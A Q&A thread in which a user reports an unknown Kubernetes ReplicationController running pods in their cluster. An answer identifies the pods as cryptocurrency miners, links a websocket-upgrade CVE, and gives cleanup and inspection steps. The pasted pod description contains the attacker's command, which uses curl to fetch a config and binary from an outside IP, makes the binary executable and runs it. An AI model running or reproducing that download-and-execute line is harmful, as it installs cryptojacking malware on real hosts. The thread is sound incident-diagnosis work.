An RC that I didn't create has appeared in my k8s cluster's default namespace, and it automatically starts 10 pods. I don't know why.
My k8s version is:
kubectl version
Client Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:34:11Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:23:29Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}
And the pods look like this: kubectl get po --namespace=default
NAME            READY     STATUS              RESTARTS   AGE
mi125yap1       0/1       ImagePullBackOff    0          1d
y1ee114-2hmp4   0/1       ContainerCreating   0          5h
y1ee114-4hqg4   0/1       ImagePullBackOff    0          5h
y1ee114-5tcb5   0/1       ContainerCreating   0          5h
y1ee114-8ft9x   1/1       Running             0          5h
y1ee114-b9bjn   0/1       ImagePullBackOff    0          5h
y1ee114-ptw9g   0/1       ImagePullBackOff    0          5h
y1ee114-rxl4m   0/1       ImagePullBackOff    0          5h
y1ee114-tn9zw   0/1       ImagePullBackOff    0          5h
y1ee114-tx99w   1/1       Running             0          5h
y1ee114-z9b4m   0/1       ImagePullBackOff    0          5h
The two pods on the master nodes, which have public network access, started successfully, but the pods on the nodes without access to the public network failed with ImagePullBackOff.
The details of one of the running pods:
kubectl describe po y1ee114-8ft9x --namespace=default
Name:           y1ee114-8ft9x
Namespace:      default
Node:           server2/172.17.0.102
Start Time:     Wed, 26 Dec 2018 05:35:15 +0800
Labels:         app=myresd01
Annotations:    kubernetes.io/created-by={"kind":"SerializedReference","apiVersion":"v1","reference":{"kind":"ReplicationController","namespace":"default","name":"y1ee114","uid":"f7ec0108-088c-11e9-856f-00163e160da9"...
Status:         Running
IP:             10.1.42.2
Created By:     ReplicationController/y1ee114
Controlled By:  ReplicationController/y1ee114
Containers:
  myresd01:
    Container ID:   docker://0b237f7e6c2b359dc1227cfdd1b726e6f6bb5346bcca129ec6a5b15336e13b25
    Image:          centos
    Image ID:       docker-pullable://centos@sha256:184e5f35598e333bfa7de10d8fb1cebb5ee4df5bc0f970bf2b1e7c7345136426
    Port:           <none>
    Command:
      sh
      -c
      curl -o /var/tmp/config.json http://192.99.142.232:8220/222.json;curl -o /var/tmp/suppoie1 http://192.99.142.232:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json
    State:          Running
      Started:      Wed, 26 Dec 2018 05:35:20 +0800
    Ready:          True
    Restart Count:  0
    Environment:    <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from default-token-5xcgh (ro)
Conditions:
  Type           Status
  Initialized    True
  Ready          True
  PodScheduled   True
Volumes:
  shared-data:
    Type:    EmptyDir (a temporary directory that shares a pod's lifetime)
    Medium:
  default-token-5xcgh:
    Type:        Secret (a volume populated by a Secret)
    SecretName:  default-token-5xcgh
    Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     <none>
Events:          <none>
And some of its logs:
[2018-12-26 02:46:18] accepted (870/0) diff 2000 (245 ms)
[2018-12-26 02:46:23] accepted (871/0) diff 2000 (246 ms)
[2018-12-26 02:46:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:46:51] accepted (872/0) diff 2000 (248 ms)
[2018-12-26 02:47:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:47:46] accepted (873/0) diff 2000 (245 ms)
[2018-12-26 02:47:49] accepted (874/0) diff 2000 (245 ms)
[2018-12-26 02:47:56] accepted (875/0) diff 2000 (247 ms)
[2018-12-26 02:48:10] accepted (876/0) diff 2000 (391 ms)
[2018-12-26 02:48:18] accepted (877/0) diff 2000 (245 ms)
[2018-12-26 02:48:20] accepted (878/0) diff 2000 (245 ms)
[2018-12-26 02:48:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:48:37] accepted (879/0) diff 2000 (246 ms)
[2018-12-26 02:48:39] accepted (880/0) diff 2000 (245 ms)
[2018-12-26 02:49:00] accepted (881/0) diff 2000 (245 ms)
[2018-12-26 02:49:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:49:39] accepted (882/0) diff 2000 (245 ms)
[2018-12-26 02:50:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:01] accepted (883/0) diff 2000 (245 ms)
[2018-12-26 02:51:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:27] accepted (884/0) diff 2000 (248 ms)
Does anyone know who created this RC and what it is for?
Those are cryptocurrency miners. My guess is your cluster was hacked via the Kubernetes websocket upgrade CVE (https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/). I would probably destroy and recreate your cluster.
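If you need to stop the mining right away before you rebuild, deleting the rogue controller should take its pods down with it. A rough sketch using the names from your output (mi125yap1 looks like a standalone pod, so it gets deleted directly; verify there is nothing else running that you don't recognize):

# list everything that can spawn pods and look for workloads you did not create
kubectl get rc,deployments,daemonsets,jobs --all-namespaces
# deleting the ReplicationController also removes the pods it manages
kubectl delete rc y1ee114 --namespace=default
kubectl delete po mi125yap1 --namespace=default

Treat this only as a stopgap: whoever created the RC presumably still has access to your API server, so it can simply come back until you rebuild the cluster and lock the API down.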
I figured this out by downloading http://192.99.142.232:8220/tte2, which was mentioned in the command in your describe output, and discovered it was an ELF binary. I ran strings on the binary and, after some scrolling, found a bunch of strings referring to "cryptonight", which is cryptocurrency mining software.
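If you want to reproduce that check, do it in a throwaway VM since the file is attacker-controlled, and only inspect it, never execute it. Roughly what I did:

# download the payload for inspection only -- do not run it
curl -o tte2 http://192.99.142.232:8220/tte2
# should report an ELF executable
file tte2
# grep saves the scrolling through the strings output
strings tte2 | grep -i cryptonight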